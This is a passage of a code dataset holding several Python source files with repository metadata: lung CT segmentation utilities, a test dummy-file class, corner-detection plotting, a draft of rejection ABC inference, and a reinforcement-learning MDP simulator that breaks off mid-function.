request.form.get(\"target\")\n    arrival = dateutil.parser.parse(request.form.get(\"arrival\"))\n    inc_id = 684\n    incomings_handler.create_test_inc(domain, player_id, source_id, target_id, arrival, inc_id)\n    return redirect(url_for(\"incomings_get\", domain = domain, player_id = player_id))\n\n","repo_name":"st4bel/DS_Timer","sub_path":"dstimer/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":37971,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"}
{"seq_id":"1212532997","text":"from matplotlib import pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom PIL import Image\nfrom skimage import measure, color\nfrom scipy import ndimage\nimport cv2\nimport copy\n\nimport scipy.io as scio\n\ndef lung_9mask_old(lungs_seg):\n    lungs_prespective = np.sum(lungs_seg, 1)\n    lungs_prespective = np.array(lungs_prespective, dtype= bool)\n    save_np = Image.fromarray(lungs_prespective)\n    save_np.save('lungs_prespective.png')\n    slience = lungs_prespective.shape[0]\n    top_slience = 0\n    down_slience = slience\n    left_edge = []\n    right_edge = []\n    for i in range(slience):\n        if top_slience == 0 and np.sum(lungs_prespective[i]):\n            top_slience = i\n        if top_slience != 0 and 
np.sum(lungs_prespective[i])==0:\n            down_slience = i\n        if np.sum(lungs_prespective[i]):\n            for j in range(lungs_prespective.shape[1]):\n                if lungs_prespective[i, j]:\n                    if left_edge and left_edge[-1][0] != i - 1:\n                        if len(left_edge)>10:\n                            break\n                        else:\n                            left_edge = []\n\n                    left_edge.append([i, j])\n                    break\n            for j in range(lungs_prespective.shape[1]):\n                if lungs_prespective[i, lungs_prespective.shape[1] - j - 1]:\n                    if right_edge and right_edge[-1][0] != i - 1:\n                        if len(right_edge)>10:\n                            break\n                        else:\n                            right_edge = []\n                    right_edge.append([i, lungs_prespective.shape[1] - j])\n                    break\n    \n    left_edge, right_edge = np.array(left_edge), np.array(right_edge)\n    left_outp = np.argmin(left_edge[:,1])\n    right_outp = np.argmax(right_edge[:, 1])\n    left_edge, right_edge = left_edge[left_outp:], right_edge[right_outp:]\n    f_left = np.polyfit(left_edge[:, 0], left_edge[:, 1], 2)\n    f_l = np.poly1d(f_left)\n    y_l = f_l(left_edge[:, 0])\n    # plt.plot(left_edge[:, 0], y1, label='fit val')\n    f_right = np.polyfit(right_edge[:, 0], right_edge[:, 1], 2)\n    f_r = np.poly1d(f_right)\n    y_r = f_r(right_edge[:, 0])\n    # plt.plot(left_edge[:, 0], left_edge[:, 1])\n    # plt.plot(right_edge[:, 0], right_edge[:, 1]) \n    # plt.savefig('lung_edgefit.png') \n    top_1th = int(round(left_edge[0,0] + (left_edge[-1,0] - left_edge[0,0]) / 3))\n    top_2th = int(round(right_edge[0,0] + (right_edge[-1,0] - right_edge[0,0]) *2/ 3))\n    left_edge1th = copy.deepcopy(left_edge)\n    right_edge1th = copy.deepcopy(right_edge)\n    left_edge2th = copy.deepcopy(left_edge)\n    right_edge2th = copy.deepcopy(right_edge)\n\n    for i in range(lungs_prespective.shape[1]):\n        if lungs_prespective[top_1th, i] == 1 and lungs_prespective[top_1th, i+1] == 0:\n            w_l = int(sum(lungs_prespective[top_1th, :i]) / 3)\n            left_edge1th[:, 1] = y_l + w_l\n            left_edge2th[:, 1] = y_l + 2*w_l\n            w_r = int(sum(lungs_prespective[top_1th, i+1:]) / 3)\n            right_edge1th[:, 1] = y_r - w_r\n            right_edge2th[:, 1] = y_r - 2*w_r\n            break\n        if lungs_prespective[top_2th, i] == 1 and lungs_prespective[top_2th, i+1] == 0:\n            w_l = int(sum(lungs_prespective[top_2th, :i]) / 3)\n            left_edge1th[:, 1] = y_l + w_l\n            left_edge2th[:, 1] = y_l + 2*w_l\n            w_r = int(sum(lungs_prespective[top_2th, i+1:]) / 3)\n            right_edge1th[:, 1] = y_r - w_r\n            right_edge2th[:, 1] = y_r - 2*w_r\n            break\n    plt.plot(right_edge[:, 0], right_edge[:, 1]) \n    plt.plot(right_edge1th[:, 0], right_edge1th[:, 1]) \n    plt.plot(right_edge2th[:, 0], right_edge2th[:, 1]) \n    plt.plot(left_edge[:, 0], left_edge[:, 1]) \n    plt.plot(left_edge1th[:, 0], left_edge1th[:, 1]) \n    plt.plot(left_edge2th[:, 0], left_edge2th[:, 1]) \n    plt.savefig('lung_edgefit.png') \n\n\ndef fun(x):\n    x = round(x, 2)\n    if x>=0: return '+'+str(x)\n    else: return str(x)\n\ndef fit_surface(X, Y, Z):\n    n = len(X)\n    sigma_x = 0\n    for i in X : sigma_x += i\n    sigma_y = 0\n    for i in Y: sigma_y += i\n    sigma_z = 0\n    for i in Z: sigma_z += i\n    sigma_x2 = 0\n    for i in X: sigma_x2 += i * i\n    sigma_y2 = 0\n    for i in Y: sigma_y2 += i * i\n    sigma_x3 = 0\n    for i in X: sigma_x3 += i * i * i\n    sigma_y3 = 0\n    for i in Y: sigma_y3 += i * i * i\n    sigma_x4 = 0\n    for i in X: sigma_x4 += i * i * i * i\n    sigma_y4 = 0\n    for i in Y: sigma_y4 += i * i * i * i\n    sigma_x_y = 0\n    for i in range(n):\n        sigma_x_y += X[i] * Y[i]\n    # print(sigma_xy)\n    sigma_x_y2 = 0\n    for i in range(n): sigma_x_y2 += X[i] * Y[i] * Y[i]\n    sigma_x_y3 = 0\n    for i in range(n): sigma_x_y3 += X[i] * Y[i] * Y[i] * Y[i]\n    sigma_x2_y = 0\n    for i in range(n): sigma_x2_y += X[i] * X[i] * Y[i]\n    sigma_x2_y2 = 0\n    for i in range(n): sigma_x2_y2 += X[i] * X[i] * Y[i] * 
Y[i]\n    sigma_x3_y = 0\n    for i in range(n): sigma_x3_y += X[i] * X[i] * X[i] * Y[i]\n    sigma_z_x2 = 0\n    for i in range(n): sigma_z_x2 += Z[i] * X[i] * X[i]\n    sigma_z_y2 = 0\n    for i in range(n): sigma_z_y2 += Z[i] * Y[i] * Y[i]\n    sigma_z_x_y = 0\n    for i in range(n): sigma_z_x_y += Z[i] * X[i] * Y[i]\n    sigma_z_x = 0\n    for i in range(n): sigma_z_x += Z[i] * X[i]\n    sigma_z_y = 0\n    for i in range(n): sigma_z_y += Z[i] * Y[i]\n    # print(\"-----------------------\")\n    # build the matrix form of the corresponding normal equations\n    a = np.array([[sigma_x4, sigma_x3_y, sigma_x2_y2, sigma_x3, sigma_x2_y, sigma_x2],\n                  [sigma_x3_y, sigma_x2_y2, sigma_x_y3, sigma_x2_y, sigma_x_y2, sigma_x_y],\n                  [sigma_x2_y2, sigma_x_y3, sigma_y4, sigma_x_y2, sigma_y3, sigma_y2],\n                  [sigma_x3, sigma_x2_y, sigma_x_y2, sigma_x2, sigma_x_y, sigma_x],\n                  [sigma_x2_y, sigma_x_y2, sigma_y3, sigma_x_y, sigma_y2, sigma_y],\n                  [sigma_x2, sigma_x_y, sigma_y2, sigma_x, sigma_y, n]])\n    b = np.array([sigma_z_x2, sigma_z_x_y, sigma_z_y2, sigma_z_x, sigma_z_y, sigma_z])\n    # solve the linear system (Gaussian elimination)\n    res = np.linalg.solve(a, b)\n\n    return res\n\n\ndef lung_9mask(lung9, edges):\n    # fig = plt.figure()  # create a figure\n    # ax = fig.add_subplot(111, projection='3d')  # 3D axes\n    res_equation = []\n    for i in range(2):\n        # i = 1\n        edge = edges[i]\n\n\n        edge1th = np.array(edge[0])\n        edge2th = np.array(edge[1])\n        edge3th = np.array(edge[2])\n\n        X, Y, Z = edge1th[:, 0], edge1th[:, 1], edge1th[:, 2]\n        X1, Y1, Z1 = edge2th[:, 0], edge2th[:, 1], edge2th[:, 2]\n        X2, Y2, Z2 = edge3th[:, 0], edge3th[:, 1], edge3th[:, 2]\n\n        res = fit_surface(X, Y, Z)\n        res1 = fit_surface(X1, Y1, Z1)\n        res2 = fit_surface(X2, Y2, Z2)\n        res_equation.append([res, res1, res2])\n        print(\"z=%.6s*x^2%.6s*xy%.6s*y^2%.6s*x%.6s*y%.6s\" % (\n            fun(res[0]), fun(res[1]), fun(res[2]), fun(res[3]), fun(res[4]), fun(res[5])))\n        x_start, x_end = min(X), max(X)\n        y_start, y_end = min(Y), max(Y)\n        x_1th, x_2th = round((x_end - x_start) / 3 + x_start), round(2 * (x_end - x_start) / 3 + x_start)\n        ux = np.linspace(x_start, x_end, x_end - x_start + 1)  # create an evenly spaced sequence\n        uy = np.linspace(y_start, y_end, y_end - y_start + 1)  # create an evenly spaced sequence\n        x, y = np.meshgrid(ux, uy)\n\n        z = res[0] * x * x + res[1] * x * y + res[2] * y * y + res[3] * x + res[4] * y + res[5]\n        z1 = res1[0] * x * x + res1[1] * x * y + res1[2] * y * y + res1[3] * x + res1[4] * y + res1[5]\n        z2 = res2[0] * x * x + res2[1] * x * y + res2[2] * y * y + res2[3] * x + res2[4] * y + res2[5]\n        x_all, y_all, z_all, z1_all, z2_all = x.flatten('F').astype(int), (y.flatten('F')).astype(int), \\\n                                              np.round(z.flatten('F')).astype(int), np.round(z1.flatten('F')).astype(int), \\\n                                              np.round(z2.flatten('F')).astype(int)\n        # plt.scatter(y_all, z_all, s=1)\n        # plt.scatter(y_all, z1_all, s=1)\n        # plt.scatter(y_all, z2_all, s=1)\n        # plt.show()\n        z_all[z_all<0] = 0\n        z1_all[z1_all<0] = 0\n        z2_all[z2_all<0] = 0\n        mid_line = int(lung9.shape[3]/2)\n        # left\n        if i == 0:\n            for id, x_i in enumerate(x_all):\n                if x_i < x_1th:\n                    lung9[0, x_i, y_all[id], z_all[id]:z1_all[id]] = 1\n                    lung9[1, x_i, y_all[id], z1_all[id]:z2_all[id]] = 1\n                    lung9[2, x_i, y_all[id], z2_all[id]:mid_line] = 1\n                elif x_i < x_2th:\n                    lung9[3, x_i, y_all[id], z_all[id]:z1_all[id]] = 1\n                    lung9[4, x_i, y_all[id], z1_all[id]:z2_all[id]] = 1\n                    lung9[5, x_i, y_all[id], z2_all[id]:mid_line] = 1\n                else:\n                    lung9[6, x_i, y_all[id], z_all[id]:z1_all[id]] = 1\n                    lung9[7, x_i, y_all[id], z1_all[id]:z2_all[id]] = 1\n                    lung9[8, x_i, y_all[id], z2_all[id]:mid_line] = 1\n\n        # for j in range(11, 34):\n        #     img_arr = np.zeros_like(lung9[0, 0, :, :])\n        #     for i in range(9):\n        #         img_arr = lung9[i, j, 
:, :] * 255 * (1+i) / 9 + img_arr\n # img = Image.fromarray(img_arr)\n # # img.save(f'./res_lung9/left_{i}.jpg')\n # img.convert('RGB').save(f'./res_lung9/left_{j}.jpg')\n # right\n if i == 1:\n for id, x_i in enumerate(x_all):\n if x_i < x_1th:\n lung9[9, x_i, y_all[id], z1_all[id]:z_all[id]] = 1\n lung9[9 + 1, x_i, y_all[id], z2_all[id]:z1_all[id]] = 1\n lung9[9 + 2, x_i, y_all[id], mid_line:z2_all[id]] = 1\n elif x_i < x_2th:\n lung9[9 + 3, x_i, y_all[id], z1_all[id]:z_all[id]] = 1\n lung9[9 + 4, x_i, y_all[id], z2_all[id]:z1_all[id]] = 1\n lung9[9 + 5, x_i, y_all[id], mid_line:z2_all[id]] = 1\n else:\n lung9[9 + 6, x_i, y_all[id], z1_all[id]:z_all[id]] = 1\n lung9[9 + 7, x_i, y_all[id], z2_all[id]:z1_all[id]] = 1\n lung9[9 + 8, x_i, y_all[id], mid_line:z2_all[id]] = 1\n return lung9, res_equation\n\ndef features_lung9(labels_mask, lung9, lungs_seg):\n features2lung9 = []\n label_num = len(labels_mask)\n for i in range(label_num):\n label_mask = labels_mask[i]\n feature2lung9 = []\n for i in range(18):\n casue_lung9 = lung9[i] * lungs_seg * label_mask\n lung_lab = measure.label(casue_lung9, connectivity=2)\n feature2lung9.append(np.max(lung_lab))\n features2lung9.append(feature2lung9)\n return features2lung9 #, lung9 ????210717\n\n\ndef imfill(img):\n output = ndimage.binary_fill_holes(img).astype(bool)\n return output\n\ndef closeopration(img):\n kernel = np.ones((5, 5), np.uint8)\n iclose = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n return iclose\n\n","repo_name":"Rsolut1on/MP_CTscore","sub_path":"tools_feature.py","file_name":"tools_feature.py","file_ext":"py","file_size_in_byte":11376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70924547771","text":"from libcloud.storage.drivers.dummy import DummyFileObject as BaseDummyFileObject\n\n\nclass DummyFile(BaseDummyFileObject):\n \"\"\"Add size just for test purpose.\"\"\"\n\n def __init__(self, yield_count=5, chunk_len=10):\n super().__init__(yield_count, chunk_len)\n self.size = len(self)\n self.filename = \"dummy-file\"\n self.content_type = \"application/octet-stream\"\n","repo_name":"jowilf/sqlalchemy-file","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"78"} +{"seq_id":"32530930560","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef plot_corner_responses(shi_tomasi, harris, img_id):\n fig, (ax1, ax2) = plt.subplots(1, 2)\n ax1.imshow(shi_tomasi.astype(np.float32))\n ax1.set_title(\"Shi-Tomasi\")\n ax2.imshow(harris.astype(np.float32))\n ax2.set_title(\"Harris\")\n fig.suptitle(\"Corner detection responses\" + img_id)\n plt.show()\n\n\ndef plot_harris_corners(image, corners_coords):\n plt.imshow(image, cmap='gray', vmin=0, vmax=255)\n plt.scatter(corners_coords[1], corners_coords[0], marker='+', c='r', s=4)\n plt.title(\"Harris k-best corners\")\n plt.show()\n\n","repo_name":"yardenas/ethz-vision-algorithms","sub_path":"point_tracker/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"36405340249","text":"import numpy as np\n\n\"\"\"\nPathos, a python parallel processing library from caltech.\n\nUnlike Python's default multiprocessing library, pathos provides a more flexible\nparallel map which can apply almost any type of function --- including lambda\nfunctions, 
nested functions, and class methods --- and can easily handle\nfunctions with multiple arguments.\n\nIn the author's own words:\n\n\"Pathos is a framework for heterogeneous computing.\nIt primarily provides the communication mechanisms for configuring\nand launching parallel computations across heterogeneous resources\"\n\nmultiprocess.Pool is a fork of multiprocessing.Pool, with the only difference\nbeing that multiprocessing uses pickle and multiprocess uses dill.\n\nThe preferred interface is pathos.pools.ProcessPool\n\nThe pathos-wrapped pool is pathos.pools.ProcessPool (and the old interface\nprovides it at pathos.multiprocessing.Pool).\n\ntqdm for pathos: https://pypi.org/project/p-tqdm/\n\n\"\"\"\n\n\n\"\"\"\nfrom pathos.multiprocessing import ProcessingPool as Pool\n\n\tclass myClass:\n\t\tdef __init__(self):\n\t\t\tpass\n\n\t\tdef square(self, x):\n\t\t\treturn x*x\n\n\t\tdef run(self, inList):\n\t\t\tpool = Pool().map\n\t\t\tresult = pool(self.square, inList)\n\t\t\treturn result\n\n\tif __name__ == '__main__':\n\t\tm = myClass()\n\t\tprint(m.run(range(10)))\n\"\"\"\n\n\nclass RejABC:\n\n    def __init__(self, observation, simulator, priors, distance='l2',\n                 rng=np.random.RandomState, seed=None):\n\n        # RejABC has no parent class, so keep the configuration on the\n        # instance directly (object.__init__ does not accept keyword args).\n        self._obs = observation\n        self._simulator = simulator\n        self._priors = priors\n        self._distance = distance\n        self._rng = rng\n        self._seed = seed\n\n        self._n_sims = 0\n\n    def sample(self, n_samples, epsilon=None, n_jobs=None, log=True):\n        \"\"\"\n        n_jobs: int, default: None\n            The maximum number of concurrently running jobs, such as the\n            number of Python worker processes when backend=\"multiprocessing\" or\n            the size of the thread-pool when backend=\"threading\". If -1 all\n            CPUs are used. If 1 is given, no parallel computing code is used\n            at all, which is useful for debugging. For n_jobs below -1,\n            (n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but\n            one are used. 
None is a marker for 'unset' that will be interpreted\n            as n_jobs=1 (sequential execution) unless the call is performed\n            under a parallel_backend context manager that sets another value\n            for n_jobs.\n        \"\"\"\n\n        self._epsilon = epsilon  # used by _draw_posterior_sample\n        samples = self._sample(n_samples)\n        return samples\n\n    def _sample(self, n_samples):\n        samples = []\n\n        for _ in range(n_samples):\n            samples.append(self._draw_posterior_sample())\n\n        return samples\n\n    def _draw_posterior_sample(self):\n        sample = None\n        while sample is None:\n            thetas = [prior.rvs(rng=self._rng, seed=self._seed + self._n_sims)\n                      for prior in self._priors]\n            sim = self._simulator(*thetas)\n            self._n_sims += 1\n            distance = self._distance(self._obs, sim)\n            if distance <= self._epsilon:\n                sample = thetas\n        return sample\n\n##\n\n\nclass ApproximateBayesianComputation(Procedure):\n    r\"\"\"\"\"\"\n\n    def __init__(self, simulator, prior, summary, acceptor):\n        super(ApproximateBayesianComputation, self).__init__()\n        # Main classical ABC properties.\n        self.acceptor = acceptor\n        self.prior = prior\n        self.simulator = simulator\n        self.summary = summary\n\n    def _register_events(self):\n        # TODO Implement.\n        pass\n\n    def _draw_posterior_sample(self, summary_observation):\n        sample = None\n\n        while sample is None:\n            prior_sample = self.prior.sample()\n            x = self.simulator(prior_sample)\n            s = self.summary(x)\n            if self.acceptor(s, summary_observation):\n                sample = prior_sample.unsqueeze(0)\n\n        return sample\n\n    def sample(self, observation, num_samples=1):\n        samples = []\n\n        summary_observation = self.summary(observation)\n        for _ in range(num_samples):\n            samples.append(self._draw_posterior_sample(summary_observation))\n        samples = torch.cat(samples, dim=0)\n\n        return samples\n\n\n\"\"\"\nOLD\n\n\"\"\"\n\n\nclass RejectionABC(ABCBase):\n    \"\"\"Rejection ABC.\n    \"\"\"\n\n    def __init__(self, observation, simulator, priors, distance='l2',\n                 rng=np.random.RandomState, seed=None):\n        \"\"\"\n        simulator : callable\n            simulator model\n        summary_calculator : callable, default None\n            summary statistics calculator. If None, simulator should output\n            sum stat\n        distance : str\n            Can be a custom function or one of l1, l2, mse\n        distance_metric : callable\n            discrepancy measure\n        \"\"\"\n\n        # self._obs = observation\n        # self._simulator = simulator # model simulator function\n        # self._priors = priors\n        # self._distance = distance # distance metric function\n        super().__init__(\n            observation=observation,\n            simulator=simulator,\n            priors=priors,\n            distance=distance,\n            rng=rng,\n            seed=seed\n        )\n\n    def __call__(self, num_simulations, epsilon, lra=False):\n        # pass by keyword: the old positional call sent 'epsilon' into\n        # 'n_samples' and 'lra' into 'epsilon' ('lra' is not used by sample yet)\n        journal = self.sample(n_sims=num_simulations, epsilon=epsilon)\n        return journal\n\n    def sample(self, n_sims=None, n_samples=None, epsilon=0.5, log=True):\n        \"\"\"\n        add **kwargs for simulator call?\n\n        Pritchard et al. (1999) algorithm\n\n        n_samples: integer\n            Number of samples to generate\n\n        epsilon : {float, str}\n            Default 'adaptive'\n\n        Notes\n        -----\n        Specifying the 'n_simulations' is generally a faster computation than\n        specifying 'n_samples', but with the trade-off that the number of\n        posterior samples will be at the mercy of the configuration\n\n        lra bool, Whether to run linear regression adjustment as in Beaumont et al. 
2002\n \"\"\"\n\n self._t0 = time.time()\n\n _inference_scheme = \"Rejection ABC\"\n\n self._log = log\n self._epsilon = epsilon\n\n if self._log:\n self.logger = setup_logger(self.__class__.__name__)\n self.logger.info(f\"Initialize {_inference_scheme} sampler.\")\n\n if n_sims is None and n_samples is None:\n msg = (\"One of 'n_sims' or 'n_samples' must be specified.\")\n raise ValueError(msg)\n if n_sims is not None and n_samples is not None:\n msg = (\"Cannot specify both 'n_sims' and 'n_samples'.\")\n raise ValueError(msg)\n\n # initialize journal\n self._journal = Journal()\n self._journal._start_journal(log, self._simulator, self._priors,\n _inference_scheme, self._distance, n_sims, epsilon)\n\n if n_sims is not None:\n if isinstance(n_sims, int):\n # call rejection loop\n self._sampler_n_sims(n_sims)\n else:\n msg = (\"The number of simulations must be given as an integer.\")\n raise TypeError(msg)\n\n if n_samples is not None:\n if isinstance(n_samples, int):\n # call rejection loop\n self._sampler_n_samples(n_samples)\n else:\n msg = (\"The number of samples must be given as an integer.\")\n raise TypeError(msg)\n\n return self._journal\n\n def _sampler_n_samples(self, n_samples):\n \"\"\"Sampling loop for specified number of posterior samples\"\"\"\n\n n_sims = 0\n n_accepted = 0\n\n if self._log:\n self.logger.info(\"Run sampler.\")\n pbar = tqdm(total=n_samples,\n desc=\"Sampling progress\",\n position=0,\n leave=True,\n colour='green')\n\n while n_accepted < n_samples:\n if self._seed is None:\n thetas = [prior.rvs(rng=self._rng) for prior in self._priors]\n else:\n thetas = [prior.rvs(rng=self._rng, seed=self._seed + n_sims)\n for prior in self._priors]\n sim = self._simulator(*thetas)\n n_sims += 1\n distance = self._distance(self._obs, sim)\n if distance <= self._epsilon:\n if self._log:\n pbar.update(1)\n n_accepted += 1\n self._journal._add_accepted_parameters(thetas)\n self._journal._add_distance(distance)\n self._journal._add_rel_distance(sim - self._obs)\n self._journal._add_threshold(self._epsilon)\n self._journal._add_sumstats(sim)\n\n if self._log:\n pbar.close()\n self.logger.info(f\"Sampler ran {n_sims} simulations to \"\n + f\"obtain {n_accepted} samples.\")\n self._journal._processing_msg()\n\n t1 = time.time() - self._t0\n self._journal._process_inference(n_sims, n_accepted, t1)\n\n if self._log:\n self._journal._done_msg()\n","repo_name":"nicolossus/pylfi","sub_path":"_dev/inferences/rej_abc_dev.py","file_name":"rej_abc_dev.py","file_ext":"py","file_size_in_byte":9200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7517607788","text":"import heapq\nimport queue as Q\nimport numpy as np\nfrom collections import Counter\nfrom abc import abstractmethod\n\nimport random\n\nimport Actor.Prioritizer as Pr\nfrom Critic.Critic import CriticFactory\nfrom Framework.Inputs import ProblemInput, AgentSimulationInput\nfrom Framework.PrioritizedObject import PrioritizedObject\nimport Simulator.SimulatorBasics as sb\nimport MDPModel.MDPBasics as mdp\n\n\nclass Simulator:\n \"\"\" Abstract class which tries to learn optimal policy via Q-Learning, based on observations \"\"\"\n\n def __init__(self, sim_input: ProblemInput):\n self.model: sb.SimulatedModel = sim_input.MDP_model\n self.evaluation_type = sim_input.eval_type\n self.gamma = sim_input.MDP_model.MDP.gamma\n self.epsilon = sim_input.epsilon\n self.evaluated_model = mdp.EvaluatedModel()\n\n self.critic = CriticFactory.generate(model=self.model, 
evaluator_type=self.evaluation_type)\n state_num = self.model.n\n sb.SimulatedState.action_num = self.model.actions\n self.evaluated_model.ResetData(self.model.n, self.model.actions)\n self.policy = [0] * state_num\n self.model.calc_policy_data(self.policy)\n\n # Initiate static variables\n sb.SimulatedState.policy = self.policy\n sb.SimulatedState.V_hat_vec = self.evaluated_model.V_hat\n\n mdp.StateActionPair.Q_hat_mat = self.evaluated_model.Q_hat\n mdp.StateActionPair.TD_error_mat = self.evaluated_model.TD_error\n mdp.StateActionPair.r_hat_mat = self.evaluated_model.r_hat\n mdp.StateActionPair.P_hat_mat = self.evaluated_model.P_hat\n mdp.StateActionPair.visitations_mat = self.evaluated_model.visitations\n\n def improve_policy(self, sim_input, **kwargs):\n \"\"\" Choose best action per state, based on Q value\"\"\"\n for state in self.model.states:\n state.policy_action = state.best_action.action\n\n self.model.calc_policy_data(self.policy)\n\n def get_action_results(self, state_action: mdp.StateActionPair):\n \"\"\" simulates desired action, and returns next_state, reward \"\"\"\n next_state, reward = self.model.MDP.sample_state_action(state_action.state.idx, state_action.action)\n return self.model.states[next_state], reward\n\n def update_model(self, current_state_action, next_state, reward):\n def update_v():\n future_v = current_state_action.P_hat @ self.evaluated_model.V_hat\n current_state_action.state.V_hat = current_state_action.r_hat + self.gamma * future_v\n\n def update_q():\n a_n = (current_state_action.visitations + 1) ** -0.7\n current_state_action.TD_error = reward + self.gamma * max(\n next_state.actions).Q_hat - current_state_action.Q_hat\n current_state_action.Q_hat += (a_n * current_state_action.TD_error)\n\n def update_p():\n curr_num_of_tran = current_state_action.P_hat * current_state_action.visitations\n curr_num_of_tran[next_state.idx] += 1\n\n new_est_p_row = curr_num_of_tran / (current_state_action.visitations + 1)\n current_state_action.P_hat = new_est_p_row\n\n def update_reward():\n current_state_action.r_hat = (current_state_action.r_hat * current_state_action.visitations + reward) / (\n current_state_action.visitations + 1)\n\n update_reward()\n update_p()\n update_v()\n update_q()\n current_state_action.UpdateVisits()\n\n def sample_state_action(self, agent_type, state_action: mdp.StateActionPair):\n next_state, reward = self.get_action_results(state_action)\n if agent_type == 'regular':\n self.update_model(state_action, next_state, reward)\n\n return reward, next_state\n\n def simulate(self, sim_input):\n self.init_simulation(sim_input)\n for i in range(int(sim_input.steps / sim_input.temporal_extension)):\n self.simulate_one_step(agents_to_run=sim_input.agents_to_run,\n temporal_extension=sim_input.temporal_extension,\n iteration_num=i,\n T_board=sim_input.T_board)\n if i % sim_input.grades_freq == 0:\n self.improve_policy(sim_input, iteration_num=i)\n if i % sim_input.evaluate_freq == 0: # sim_input.evaluate_freq - 1:\n self.sim_evaluate(trajectory_len=sim_input.trajectory_len,\n running_agents=sim_input.agents_to_run,\n gamma=self.gamma)\n if i % 1000 == 0: print('1000 down')\n # if i % sim_input.reset_freq == 0: # sim_input.reset_freq - 1:\n # self.Reset()\n\n return self.critic\n\n def reset(self):\n pass\n\n def init_simulation(self, sim_input):\n pass\n\n @abstractmethod\n def simulate_one_step(self, agents_to_run, **kwargs):\n pass\n\n def sim_evaluate(self, **kwargs):\n self.critic.critic_evaluate(initial_state=self.raffle_initial_state(), 
good_agents=50,\n chain_num=self.model.MDP.chain_num,\n active_chains_ratio=self.model.MDP.active_chains_ratio,\n active_chains=self.model.MDP.get_active_chains(),\n **kwargs)\n\n def raffle_initial_state(self):\n return np.random.choice(self.model.states, p=self.model.MDP.init_prob)\n\n @property\n def opt_policy(self):\n return self.model.MDP.opt_policy\n\n\nclass AgentSimulator(Simulator):\n def __init__(self, sim_input: ProblemInput):\n super().__init__(sim_input)\n self.agents_num = sim_input.agent_num\n self.init_prob = self.model.init_prob\n self.agents = Q.PriorityQueue()\n self.optimal_agents = self.generate_optimal_agents(sim_input.agent_num)\n self.reset_agents(self.agents_num)\n\n self.graded_states = {state.idx: (state.idx, random.random()) for state in self.model.states}\n\n def generate_optimal_agents(self, agents_num):\n agents_list = []\n good_agents = 0\n while good_agents < agents_num:\n new_agent = sb.Agent(100 + good_agents, self.raffle_initial_state(), agent_type='optimal')\n next_state, _ = self.get_action_results(self.choose_action(new_agent.curr_state, new_agent.type))\n if next_state.chain not in self.model.MDP.get_active_chains():\n continue\n new_agent.curr_state = next_state\n agents_list.append(new_agent)\n good_agents += 1\n\n return agents_list\n\n def sim_evaluate(self, **kwargs):\n kwargs['agents_reward'] = list(map(lambda agent: agent.object.get_online_and_zero(), self.agents.queue))\n kwargs['optimal_agents_reward'] = list(map(lambda agent: agent.get_online_and_zero(), self.optimal_agents))\n super().sim_evaluate(**kwargs)\n\n def choose_init_state(self):\n return np.random.choice(self.model.states, p=self.init_prob)\n\n def get_stats_for_prioritizer(self, method, parameter):\n if parameter is None:\n return None, None\n\n if method == 'model_free':\n return self.model.MDP, self.evaluated_model.TD_error if parameter == 'error' else None\n\n if parameter == 'reward':\n return self.evaluated_model.P_hat, self.evaluated_model.r_hat\n if parameter == 'error':\n return self.evaluated_model.P_hat, abs(self.evaluated_model.TD_error)\n if parameter == 'v_f':\n return self.evaluated_model.P_hat, self.evaluated_model.V_hat\n if parameter == 'ground_truth':\n return self.model.MDP.P, np.transpose(self.model.MDP.expected_r)\n\n def improve_policy(self, sim_input, **kwargs):\n \"\"\"\n :param sim_input: simulation parameters\n :param kwargs: must contain current iteration number, for reincarnation\n :effect: calculate new indexes for all sates, and grade agents accordingly\n \"\"\"\n super().improve_policy(sim_input)\n\n p, r = self.get_stats_for_prioritizer(sim_input.method, sim_input.parameter)\n prioritizer = sim_input.prioritizer(states=self.model.states,\n policy=self.policy,\n p=p,\n r=r,\n temporal_extension=sim_input.temporal_extension,\n discount_factor=sim_input.gittins_discount,\n trajectory_num=sim_input.trajectory_num,\n max_trajectory_len=sim_input.max_trajectory_len,\n parameter=sim_input.parameter)\n self.graded_states = prioritizer.grade_states()\n\n self.regrade_all_agents(kwargs['iteration_num'], sim_input.grades_freq)\n\n def reincarnate_agent(self, agent, iteration_num, grades_freq):\n pass\n # if iteration_num - agent.last_activation > 10000 * grades_freq:\n # agent.last_activation = iteration_num\n # agent.curr_state = self.RaffleInitialState()\n\n def regrade_all_agents(self, iteration_num, grades_freq):\n \"\"\"invoked after states re-prioritization. 
Replaces queue\"\"\"\n new_queue = Q.PriorityQueue()\n while self.agents.qsize() > 0:\n agent = self.agents.get().object\n self.reincarnate_agent(agent, iteration_num, grades_freq)\n new_queue.put(self.grade_agent(agent))\n\n self.agents = new_queue\n\n def grade_agent(self, agent):\n \"\"\" Agents in non-visited states / initial states are prioritized\"\"\"\n state = agent.curr_state.idx\n score = (0, -np.inf) if state in self.model.init_states_idx else self.graded_states[state]\n return PrioritizedObject(agent, score)\n\n def simulate_one_step(self, agents_to_run, **kwargs):\n \"\"\" Find top-priority agents, and activate them for a single step\"\"\"\n possible_states = [agent.object.curr_state.idx for agent in self.agents.queue]\n\n agents_list = [self.agents.get().object for _ in range(agents_to_run)]\n activated_states = [agent.curr_state.idx for agent in agents_list]\n\n self.optimal_agents = self.optimal_agents[:agents_to_run]\n\n for agent in agents_list + self.optimal_agents:\n for _ in range(kwargs['temporal_extension']):\n self.simulate_agent(agent, **kwargs)\n if agent.type == 'regular':\n self.critic.update(agent.chain, agent.curr_state.idx)\n\n if agent.type == 'regular':\n self.agents.put(self.grade_agent(agent))\n\n return possible_states, activated_states\n\n def choose_action(self, state: sb.SimulatedState, agent_type, t_board=0):\n if agent_type == 'optimal':\n return state.actions[self.opt_policy[state.idx]]\n\n if agent_type == 'regular':\n min_visits, 